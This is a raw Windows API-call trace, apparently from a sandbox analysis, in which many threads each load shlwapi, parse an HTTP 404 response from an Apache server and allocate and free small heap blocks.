[0246.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0246.652] GetProcessHeap () returned 0x690000 [0246.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0246.652] GetProcessHeap () returned 0x690000 [0246.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 291 os_tid = 0x1414 [0246.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.865] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.865] GetProcessHeap () returned 0x690000 [0246.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0246.865] GetProcessHeap () returned 0x690000 [0246.865] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0246.865] GetProcessHeap () returned 0x690000 [0246.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 292 os_tid = 0x1418 [0247.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.063] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.063] GetProcessHeap () returned 0x690000 [0247.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0247.063] GetProcessHeap () returned 0x690000 [0247.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0247.064] GetProcessHeap () returned 0x690000 [0247.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 293 os_tid = 0x141c [0247.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.240] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.240] GetProcessHeap () returned 0x690000 [0247.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0247.240] GetProcessHeap () returned 0x690000 [0247.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0247.240] GetProcessHeap () returned 0x690000 [0247.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 294 os_tid = 0x1420 [0247.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.404] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.405] GetProcessHeap () returned 0x690000 [0247.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0247.405] GetProcessHeap () returned 0x690000 [0247.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0247.405] GetProcessHeap () returned 0x690000 [0247.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 295 os_tid = 0x1424 [0247.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.613] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.613] GetProcessHeap () returned 0x690000 [0247.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0247.613] GetProcessHeap () returned 0x690000 [0247.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0247.613] GetProcessHeap () returned 0x690000 [0247.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 296 os_tid = 0x1428 [0247.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.788] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.788] GetProcessHeap () returned 0x690000 [0247.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0247.788] GetProcessHeap () returned 0x690000 [0247.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0247.788] GetProcessHeap () returned 0x690000 [0247.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 297 os_tid = 0x142c [0248.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.025] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.025] GetProcessHeap () returned 0x690000 [0248.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0248.025] GetProcessHeap () returned 0x690000 [0248.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0248.025] GetProcessHeap () returned 0x690000 [0248.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 298 os_tid = 0x1430 [0248.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.170] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.170] GetProcessHeap () returned 0x690000 [0248.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0248.170] GetProcessHeap () returned 0x690000 [0248.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0248.170] GetProcessHeap () returned 0x690000 [0248.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 299 os_tid = 0x1434 [0248.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.380] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.380] GetProcessHeap () returned 0x690000 [0248.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0248.380] GetProcessHeap () returned 0x690000 [0248.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0248.380] GetProcessHeap () returned 0x690000 [0248.381] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 300 os_tid = 0x1438 [0248.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.621] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.621] GetProcessHeap () returned 0x690000 [0248.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0248.621] GetProcessHeap () returned 0x690000 [0248.621] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0248.621] GetProcessHeap () returned 0x690000 [0248.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 301 os_tid = 0x143c [0248.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0248.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.825] GetProcessHeap () returned 0x690000 [0248.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0248.825] GetProcessHeap () returned 0x690000 [0248.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0248.825] GetProcessHeap () returned 0x690000 [0248.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 302 os_tid = 0x1440 [0249.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.079] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.079] GetProcessHeap () returned 0x690000 [0249.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0249.079] GetProcessHeap () returned 0x690000 [0249.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0249.079] GetProcessHeap () returned 0x690000 [0249.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 303 os_tid = 0x1444 [0249.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.262] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.262] GetProcessHeap () returned 0x690000 [0249.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0249.262] GetProcessHeap () returned 0x690000 [0249.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0249.262] GetProcessHeap () returned 0x690000 [0249.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 304 os_tid = 0x1448 [0250.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.738] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.738] GetProcessHeap () returned 0x690000 [0250.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0250.738] GetProcessHeap () returned 0x690000 [0250.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0250.738] GetProcessHeap () returned 0x690000 [0250.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 305 os_tid = 0x1450 [0250.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.915] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.915] GetProcessHeap () returned 0x690000 [0250.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0250.915] GetProcessHeap () returned 0x690000 [0250.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0250.915] GetProcessHeap () returned 0x690000 [0250.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 306 os_tid = 0x145c [0251.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.083] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.083] GetProcessHeap () returned 0x690000 [0251.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0251.083] GetProcessHeap () returned 0x690000 [0251.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0251.083] GetProcessHeap () returned 0x690000 [0251.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 307 os_tid = 0x1464 [0251.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.237] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.237] GetProcessHeap () returned 0x690000 [0251.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0251.237] GetProcessHeap () returned 0x690000 [0251.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0251.237] GetProcessHeap () returned 0x690000 [0251.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 308 os_tid = 0x1468 [0251.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.419] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.419] GetProcessHeap () returned 0x690000 [0251.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0251.419] GetProcessHeap () returned 0x690000 [0251.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0251.419] GetProcessHeap () returned 0x690000 [0251.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 309 os_tid = 0x146c [0251.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.591] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.591] GetProcessHeap () returned 0x690000 [0251.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0251.591] GetProcessHeap () returned 0x690000 [0251.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0251.591] GetProcessHeap () returned 0x690000 [0251.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 310 os_tid = 0x1470 [0251.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.798] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.798] GetProcessHeap () returned 0x690000 [0251.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0251.798] GetProcessHeap () returned 0x690000 [0251.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0251.798] GetProcessHeap () returned 0x690000 [0251.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 311 os_tid = 0x1474 [0251.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.959] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.959] GetProcessHeap () returned 0x690000 [0251.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0251.959] GetProcessHeap () returned 0x690000 [0251.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0251.959] GetProcessHeap () returned 0x690000 [0251.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 312 os_tid = 0x1478 [0252.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.143] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.143] GetProcessHeap () returned 0x690000 [0252.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0252.143] GetProcessHeap () returned 0x690000 [0252.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0252.143] GetProcessHeap () returned 0x690000 [0252.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 313 os_tid = 0x1480 [0252.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.306] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.307] GetProcessHeap () returned 0x690000 [0252.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0252.307] GetProcessHeap () returned 0x690000 [0252.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0252.307] GetProcessHeap () returned 0x690000 [0252.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 314 os_tid = 0x1488 [0252.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.486] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.486] GetProcessHeap () returned 0x690000 [0252.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0252.486] GetProcessHeap () returned 0x690000 [0252.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0252.487] GetProcessHeap () returned 0x690000 [0252.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 315 os_tid = 0x1490 [0252.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.756] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.756] GetProcessHeap () returned 0x690000 [0252.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0252.756] GetProcessHeap () returned 0x690000 [0252.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0252.756] GetProcessHeap () returned 0x690000 [0252.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 316 os_tid = 0x149c [0253.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.041] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.041] GetProcessHeap () returned 0x690000 [0253.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0253.041] GetProcessHeap () returned 0x690000 [0253.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0253.041] GetProcessHeap () returned 0x690000 [0253.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 317 os_tid = 0x14ac [0253.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.225] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.225] GetProcessHeap () returned 0x690000 [0253.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0253.225] GetProcessHeap () returned 0x690000 [0253.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0253.225] GetProcessHeap () returned 0x690000 [0253.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 318 os_tid = 0x14b4 [0253.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.491] GetProcessHeap () returned 0x690000 [0253.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0253.491] GetProcessHeap () returned 0x690000 [0253.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0253.491] GetProcessHeap () returned 0x690000 [0253.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 319 os_tid = 0x14b8 [0253.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.721] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.721] GetProcessHeap () returned 0x690000 [0253.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0253.721] GetProcessHeap () returned 0x690000 [0253.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0253.721] GetProcessHeap () returned 0x690000 [0253.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 320 os_tid = 0x14c4 [0253.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.938] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.938] GetProcessHeap () returned 0x690000 [0253.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0253.938] GetProcessHeap () returned 0x690000 [0253.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0253.938] GetProcessHeap () returned 0x690000 [0253.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 321 os_tid = 0x14d0 [0254.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.214] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") 